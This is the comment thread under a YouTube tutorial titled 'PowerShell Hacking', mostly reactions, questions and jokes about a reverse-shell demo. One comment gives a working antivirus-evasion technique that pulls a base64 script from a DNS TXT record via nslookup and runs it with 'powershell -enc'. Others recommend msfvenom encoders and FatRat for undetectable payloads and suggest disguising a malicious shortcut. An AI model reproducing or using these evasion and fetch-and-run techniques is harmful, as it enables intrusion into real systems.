PowerShell Hacking

Поділитися
Вставка
  • Опубліковано 30 лис 2024

КОМЕНТАРІ • 176

  • @LLubdeRr
    @LLubdeRr 2 роки тому +9

    Learned more about this topic in 8 min of this video than in two lessons with my teacher... thanks for that.

  • @exploit.6848
    @exploit.6848 2 роки тому +31

    Great power comes with great responsibility
    - Yes LOI sir

    • @skeeterwyh
      @skeeterwyh 2 роки тому +1

      This will not work if the target PC didn’t download that file

  • @YoloMoloPolo300
    @YoloMoloPolo300 Рік тому +2

    Add to your PowerShell command to startup chrome as well. Target runs your shortcut, lets you in still see the chrome window that they were expecting.

  • @tamboleo
    @tamboleo 2 роки тому +60

    So for hacking a PC you need to previously have access to that PC... Oooookayyyy... And to be on the same network... and to have Windows firewall allowing 1337 connections?? That's... just pretty specific situation no?

    • @Themusicbiz
      @Themusicbiz 2 роки тому +2

      Only for the 1337 h4x0rs

    • @some_random_wot_dude485
      @some_random_wot_dude485 2 роки тому +8

      Just plug an USB in every computer you have access to.

    • @DestoFlix
      @DestoFlix 2 роки тому +4

      Bruh... Its the equivalent of being taught how to build a musket in a world where you can easily get an auto machine. Anydesk could do the same and more without setting off the anti virus.

    • @dancer_queen642
      @dancer_queen642 2 роки тому +6

      Have you ever heard name of social engineering techniques?😏

    • @williamgomez6226
      @williamgomez6226 2 роки тому +1

      It helps you get into hacking very effectively!!!

  • @scottbarker1337
    @scottbarker1337 2 роки тому +1

    Just found your channel and site, I cannot watch enough. Simply fantastic tutorials and rich explaination. 10/10

  • @tchitchuJnr
    @tchitchuJnr 2 роки тому +4

    i don't understand using 'hacking' word when you have direct access to a target and set it up how you need to get access to it

    • @onwongjan9621
      @onwongjan9621 Рік тому +1

      Glad you said that becasue i wonder the same thing.. lol..

  • @waldemarfocht1564
    @waldemarfocht1564 2 роки тому +11

    I work in the IT-Sec area and can tell you that this is not about hacking, attacking or anything like that. Only the functionality of a reverse shell is shown here.
    1. Any EDR or AV solution that says anything about itself would have prevented the download of the .ps1 file.
    2. IEX commands, with a reference to an external address, would immediately be blocked by any EDR and AV solution. Even PowerShell v7 itself blocks this.
    3. Although this is not a security mechanism, the PowerShell ExecutionPolicy would also intervene here and block the unsigned script.
    You have to be a little more imaginative.
    e.g. use base64 encoded script and work with -encodedcommand or use script blocks...
    It always works and I haven't seen an environment where it doesn't work:
    1. Host a domain
    2. Create TXT record with the base64 encoded script
    3. Then make the target system run the following command: "powershell -enc (nslookup -q=txt example[.]com)[-1]"
    In this case, nslookup resolves the domain name and gets the TXT record entered from the domain. This TXT record contains the base64 encoded script and is passed to powershell.
    So far I have not seen any EDR or AV solution that blocked this.

    • @SliderOverride
      @SliderOverride 2 роки тому

      To funny he calls that hacking by downloading the script and run the Script it's not Hacker Loi, it's hacker "LOL"

    • @waldemarfocht1564
      @waldemarfocht1564 2 роки тому

      ​@@SliderOverride I don't understand what's wrong with that. How do automated attacks work? One attempts to trick the victim's system into executing commands it is not supposed to. In most cases, this is done by downloading and executing ready-made code. The trick is to bypass all detection mechanisms and smuggle the code past them.
      In a real scenario, an attacker would only create code tailored to the victim in exceptional cases. In most cases, the code tends to be tailored to a vulnerability that fits many victims. An OnPrem Exchange Server is particularly popular here.

    • @SliderOverride
      @SliderOverride 2 роки тому +1

      @@waldemarfocht1564 like start Teamviewer and enter Id haha.
      It's not hacking if someone creates self shortcut on their desktop to start download. The question is more how you get the icon on the user's desktop without his interaction
      Then you can also download other executable files and run it with a script on your computer that's not hacking

    • @testtest-ez3mp
      @testtest-ez3mp Рік тому +1

      thats smart, does this still work?

    • @waldemarfocht1564
      @waldemarfocht1564 Рік тому

      @@testtest-ez3mp yeah it still works.

  • @tekklov2646
    @tekklov2646 Рік тому +1

    So interesting..i use only CMD for running Scripts against the target Machine thanks for that Video ! ❤️

  • @troopsleader4066
    @troopsleader4066 2 роки тому +1

    plzz make a video on scada system

  • @longlost8424
    @longlost8424 2 роки тому

    Gr8 video on how easy it is to access/control the winders remote host system. this shines such a bright light on c2c functionality vulnerabilities within winblows power shell. if only they all knew.......

  • @GhostByteSoldier
    @GhostByteSoldier 5 місяців тому

    thats all nice but what can we actaly do when we god the reverse shell

  • @mysony1360
    @mysony1360 2 роки тому +1

    Can you please share your thoughts and knowledge about Windows Sandbox.
    If using sandbox to open malware, virus or infected files, will this stop the "infection" to go out of the sandbox?
    Does is it protect for all kinds of threats?
    And, closing the sandbox, will this delete the infection, or it may stay in the system?
    Love your videos!!!
    Thanks a bunch!!

  • @tomasgorda
    @tomasgorda 2 роки тому +1

    This look really nice, but could you do the same when you have av on, running defender and blocked using of IEX ? Like windows is normally working ?

  • @rferabel
    @rferabel 2 роки тому

    Hello, I wish to learn cybersecurity and hacking at the same time, how can I go about it please. I have no knowledge about them

  • @PaulMG
    @PaulMG 2 роки тому +1

    Wow. Very interesting stuff. Very educative

  • @Belkacemnotafraid
    @Belkacemnotafraid 2 роки тому

    hello loiliang yang we want you to put vedio about the attiny 85 digispark

  • @darknode4791
    @darknode4791 Рік тому

    Can we perform it over WAN by like ssh tunneling and then specifying the tunnel's info instead of our so that the traffic will forward to our local host only

  • @mbauwuwofficial
    @mbauwuwofficial 2 роки тому +1

    Hello sir, how remote access android with ip addres?

  • @mara-uo1ob
    @mara-uo1ob 2 роки тому

    Hi 👋 mr loh I need your advice i have 12 yrs Experience in sales marketing I want to do career conversion cyber security are you able to advise me.

  • @respect444
    @respect444 2 роки тому +1

    Tq sir..... it's hackers world...... form Anonymous.

  • @bulluinvestment3649
    @bulluinvestment3649 2 роки тому

    LOVE💖💖💖💖from INDIA(ODISHA)

  • @StoicGuideMap
    @StoicGuideMap 4 місяці тому

    Only problem is that you need to get a user to download an application with malicious code, and also that code needs to not be detected by Windoes defender, which in this case, the powercat script is caught by Windows security and blocked from being downloaded.

  • @calisrox4136
    @calisrox4136 2 роки тому

    daaamn, you best teacher hacker loi!!

  • @geekgoof7045
    @geekgoof7045 2 роки тому

    Any video on how to stop someone from accessing your device?

  • @sentient314
    @sentient314 2 роки тому +1

    Wow. This is some productive teaching shit

  • @sushant7906
    @sushant7906 2 роки тому

    how I begin with hacking that I learn these type of things in details ?

  • @msmediascreenentertainment1951
    @msmediascreenentertainment1951 2 роки тому

    Great, please make one video for automation with Excel

  • @dr.wingkow3038
    @dr.wingkow3038 Рік тому

    Good explanation.. By the way can you make tutorial "How To Exploit Pro Ftpd and Pure Ftpd with Metaslpoitable. Thanks before.

  • @felixkiprop48
    @felixkiprop48 Рік тому

    Window Defender: "Am i a joke".

  • @bryanb3352
    @bryanb3352 2 роки тому +1

    Is any of this supposed to be surprising? Wow.. you're running powershell and downloading files. Crazy stuff.

  • @hamzarashid7579
    @hamzarashid7579 2 роки тому

    I think the windwos defender is gonna pop up!!

  • @bluesky8589
    @bluesky8589 2 роки тому

    Hello, Are you available to chat offline about a project?

  • @froshieee
    @froshieee 2 роки тому

    Hey, i have a question, how do i check If I got ratted. I have done the cmd comman netstat/nbf and got some stuff that said (cant obtain ownership information). I checked the tcp under them and the location and they all seem to be pretty trustable. But i am still a bit worried.

  • @krotson6767
    @krotson6767 Рік тому +1

    Will any antivirus protect against this attack?

    • @rudyNok
      @rudyNok 22 дні тому +1

      Any decent antivirus respectively firewall should protect you against him being able to set it up like this. The real hacking is how to get that script on your computer in the first place. Unless you download it yourself it's not so easy.

  • @jokarjapan
    @jokarjapan Рік тому

    What about windows defender real-time protection if enabled ?

    • @architech5940
      @architech5940 9 місяців тому

      Doesn't work. You'll never get one of these powershell listeners to work on modern systems, not happening.

  • @judithsalva4433
    @judithsalva4433 2 роки тому

    Are we using PowerShell from linux vm or Windows vm?

  • @jackofalltrades200
    @jackofalltrades200 2 роки тому

    Mind to make a video on how to evade this kind of Attack? Or even remove this shell file from your PC? Incase you noticed you got fused ?

  • @12335mohammad
    @12335mohammad 2 роки тому

    ok do not forget to turn on real time and the firewall

  • @t3chcs
    @t3chcs Рік тому

    can it be possible that it doesnt work for me if i use a mobile hotspot as my internet?

  • @PetritK10
    @PetritK10 2 роки тому

    Can you make a video about AWS Hacking, like AWSGOAT project

  • @dreamkiller2693
    @dreamkiller2693 2 роки тому +2

    can you hack someone outside your network using this?

  • @TheUrBarber
    @TheUrBarber 3 місяці тому

    He said put on your black hat 😅😂

  • @SyedKamranAhmed
    @SyedKamranAhmed 2 роки тому

    how to check our system is compromise or not.

  • @Pentestersploit
    @Pentestersploit 2 роки тому

    Thanks alot for the tutorial very helpful

  • @jeremyrichardson24
    @jeremyrichardson24 2 роки тому

    If you had something like this running on your system would it show up on the output of netstat ?

    • @architech5940
      @architech5940 9 місяців тому

      Yes. Changing the output requires a post exploitation binary manipulation of the netstat program itself, which is not going to be easy but can be done. Also, these powershell hacks don't actually work unless windows defender is completely off and your firewall is down. This is more for proof of concept that remote code execution is feasible once you've leveraged an exploit.

  • @jasveer2sgnr
    @jasveer2sgnr 2 роки тому

    How to make spynote payload FUD?

  • @segdesc
    @segdesc 2 роки тому

    How do you write on the screen?

  • @hxd9321
    @hxd9321 2 роки тому

    Mr hacker Loi please do an iPhone reverse shell tutorial

  • @harshpanchal5878
    @harshpanchal5878 2 роки тому +2

    You never disappoint us,
    Always love your work 🙌🏻❤️

  • @airplanemode6353
    @airplanemode6353 2 роки тому

    Hey I wish you read my comment
    Can you tell us how to solve Erros in Kali Linux like if I typed a command and it didn't work because an error so how I find the solution to that error like is there a website or something like that like where I should go to find a solution for my error Because most of time when I search in Google or UA-cam I actually find nothing or find a solution but it doesn't work

  • @code.islife493
    @code.islife493 2 роки тому +2

    Script kiddie: tries to install powercat.
    Windows defender: Pipe down little fella.

  • @devas3761
    @devas3761 2 роки тому

    Hello sir our company email address is getting spoffed please help me to fix this

  • @maximadeti8009
    @maximadeti8009 2 роки тому

    Hello Sir, i just wanted my fb acc back. I no longer have acces to email and phone number. I even tried the one that u can send ur government id's but it won't go thru. I dont know what to do..i am just an ordinary people doesnt know about computer. Please help me..i watch ur reset any email episodes but dont know how to do it.

  • @princesunil26k
    @princesunil26k 6 місяців тому

    My system been hacked like this what can i do now, please help me

  • @jackofalltrades200
    @jackofalltrades200 2 роки тому +11

    Ohhh! I think there's a malicious shell running on my PC because whenever I restart my PC I see a Quick she'll run a code and close.

    • @eddybash1342
      @eddybash1342 2 роки тому +2

      Run only linux !

    • @hereallweek
      @hereallweek 2 роки тому +1

      You’re most likely fine that’s your computers bios booting up

    • @jackofalltrades200
      @jackofalltrades200 2 роки тому

      @@hereallweek Bios booting up?🤣 What No! I mean after when am Running windows interface .. like 30mins after boot up! Then you'll see Both the POWERSHELL and CMD. Make a Quick Pop up! Run a code and exit

    • @jackofalltrades200
      @jackofalltrades200 2 роки тому

      @@eddybash1342 what'd you mean? Run only Linux?

    • @lePoTo51
      @lePoTo51 2 роки тому +1

      Can be like for me running task from the provider of the computer, HP in exemple got task opening cmd for running Diag Utility.
      What you Can Do IS scan with MalwareByte and if nothing check with Autorun, from Microsoft SysInternal lab, too see whats going on when you boot, be carefull, only disable what you are sure too understand.
      And don't panic, like a Say, maybe a diag software from the pc provider, coule bé anything like Samsung Magic,HP diag, Realktek etc...

  • @theshyguy3
    @theshyguy3 Рік тому

    every time i try this on my main and dummy computer my dummy computer running windows says it cant connect to the remote server. plz help

  • @firozajilani9316
    @firozajilani9316 11 місяців тому

    How can I send shortcut file to any one. ??

  • @lazutozu2729
    @lazutozu2729 2 роки тому

    The great power comes the great responsibility

  • @viralmoments8671
    @viralmoments8671 2 роки тому

    I would like to buy hacking course

  • @Themusicbiz
    @Themusicbiz 2 роки тому

    Bro you don’t need to “slow down” but pauses after periods and commas would be nice. Sounds like one run on sentence

  • @shibuadak7419
    @shibuadak7419 2 роки тому

    sir please tell me how to create fund payload to bypass all av and crate it in .mp3 or .mp4 format. I need your help sir

    • @MrGeniusOfficial1
      @MrGeniusOfficial1 2 роки тому

      Use FatRat

    • @shibuadak7419
      @shibuadak7419 2 роки тому

      @@MrGeniusOfficial1 i use it but it not worker properly

    • @MrGeniusOfficial1
      @MrGeniusOfficial1 2 роки тому

      For which platform you want to make payload?.. You can also bind it with any file using winrar

    • @shibuadak7419
      @shibuadak7419 2 роки тому

      @@MrGeniusOfficial1 we never bypass windows defender

    • @MrGeniusOfficial1
      @MrGeniusOfficial1 2 роки тому

      @@shibuadak7419 to Bypass defender u just need msfvenom dear and some knowledge of encoders in msfvenom or metasploit

  • @keremozcan4329
    @keremozcan4329 6 місяців тому

    I just happened to notice 13 different powershell apps has opened on my computer and trying to find solution. Any helps? Am i under attack?

  • @ПетроМетро-я6г
    @ПетроМетро-я6г 2 роки тому

    that's why I disabled ability to run powershell for users

  • @arunbonthu3182
    @arunbonthu3182 2 роки тому

    good job male, thanks!

  • @2s.2dgklmlaw
    @2s.2dgklmlaw 2 роки тому

    thanks man you are great. you got a new subscriber :)

  • @danygreen2967
    @danygreen2967 2 роки тому

    this is awesome i would like to be like you in the future .. :D

  • @TheUrBarber
    @TheUrBarber 3 місяці тому

    I turned around for literally 3 seconds and he had a server running.

  • @WillSanchez1129
    @WillSanchez1129 Рік тому

    Master loi
    I truly admire and respect the skill that you have and the work you put in to getting there.
    I was wondering is there anyway that you can mentor me to make me a coder. The price doesn’t matter. I just want to Learn that trade and be swift with it. Please consider my humble request One more thing is there anyway that you can slow down just a little bit? Because I have to play your video at the slowest setting possible to be able understand

  • @viralmoments8671
    @viralmoments8671 2 роки тому

    When we are chatting on whatsapp are something like that...

  • @مشعلالعنزي-ذ5ل6ط
    @مشعلالعنزي-ذ5ل6ط 2 роки тому

    Where are you, did you go to the moon? ❤️

  • @Jeff_Got_Keys_Pranks
    @Jeff_Got_Keys_Pranks 2 роки тому

    Love your programme

  • @KyleJCane
    @KyleJCane 2 роки тому

    Hey hacker Lili why is sometimes metasploit is not working

  • @juanjo3002
    @juanjo3002 2 роки тому

    This works even with windows defender on?

  • @الوقايةخيرمنالعلاج-ظ1ق

    Please 🙏 make a tutorial about mobile Android hacking I'am so sad

    • @hxd9321
      @hxd9321 2 роки тому

      He already had

  • @chrisantusobogi8951
    @chrisantusobogi8951 2 роки тому

    Help me to know how to mod premium paid apps from Google playstore please 🙏🙏

  • @maxman126
    @maxman126 2 роки тому +2

    This is just jakobys payloads ....

    • @IamJakoby
      @IamJakoby 2 роки тому +1

      Interesting huh 🤔

  • @lifediaries5592
    @lifediaries5592 2 роки тому

    He is not a hacker. Don’t trust him. He is pretending to be one. The TRUTH he is scamming people by taking their money.

  • @moujmast45
    @moujmast45 2 роки тому

    Best of the best

  • @Elliottwavetheory6
    @Elliottwavetheory6 2 роки тому

    Sir , this is not fair you didn't tell us the main thing ( you know lot more ways than this scriptkiddi attacks)

  • @marshalldteach1109
    @marshalldteach1109 2 роки тому

    I'm here because of Uber :D

  • @IND_SUBODH_GAMING
    @IND_SUBODH_GAMING 2 роки тому +1

    Dear sir make a video from wifi password cracked

  • @samsepiol5137
    @samsepiol5137 2 роки тому

    and windows defender is a cucumber

  • @renatofreirefilho
    @renatofreirefilho 2 роки тому

    Excelente Loi, como sempre muito bem explicado, continue com mais exemplos utilizando o powershell, são ótimos! Obrigado.

  • @LeLabodesEntrepreneurs
    @LeLabodesEntrepreneurs 2 роки тому

    Hi my boss how to hack any sellfunel

  • @dxddrb6557
    @dxddrb6557 2 роки тому

    That was confusing lol

  • @Naruto_Ep_tamil
    @Naruto_Ep_tamil 2 роки тому

    Brother my gmail is hacked they changed every data please can you get it back please

  • @mhmdmd9525
    @mhmdmd9525 2 роки тому

    David Bombal's fans ????

  • @mayhem1994
    @mayhem1994 2 роки тому

    love your videos aye

  • @Muhammed.Abd.
    @Muhammed.Abd. 11 місяців тому

    My Windows Defender catches powercat.ps1 when downloaded.
    Category: Backdoor
    Details: This program provides remote access to the computer it is installed on.
    How do you tackle this??

  • @viralmoments8671
    @viralmoments8671 2 роки тому

    Good video

  • @amservis8050
    @amservis8050 2 роки тому

    yes..yes..perfect

  • @viralmoments8671
    @viralmoments8671 2 роки тому

    But you speak very speedy

  • @sushant7906
    @sushant7906 2 роки тому

    OMG ! I just do it. That's unbelievable 😶‍🌫😶‍🌫

  • @fz7833
    @fz7833 2 роки тому +1

    In 3,2,1 boom

  • @hasashi_Aayu
    @hasashi_Aayu Рік тому

    everything i do gets blocked by my antivirus lol so maybe we can't hack systems which have anti virus in it

  • @workout.trending
    @workout.trending 2 роки тому

    bro can you hack a pc gamer and send it for me thank you 😃

  • @CYBER-HERO
    @CYBER-HERO 2 роки тому

    My nigga is here

  • @shahariyardhiraj9885
    @shahariyardhiraj9885 2 роки тому

    Sir I'm learning ur paid hacking udemy course for free.
    please pardon me 😅🙏

  • @newbieberkarya6442
    @newbieberkarya6442 2 роки тому

    Windows defender exist 🗿

  • @NoGreedSeeds
    @NoGreedSeeds 2 роки тому

    Mmmmm. Power Hell. 😂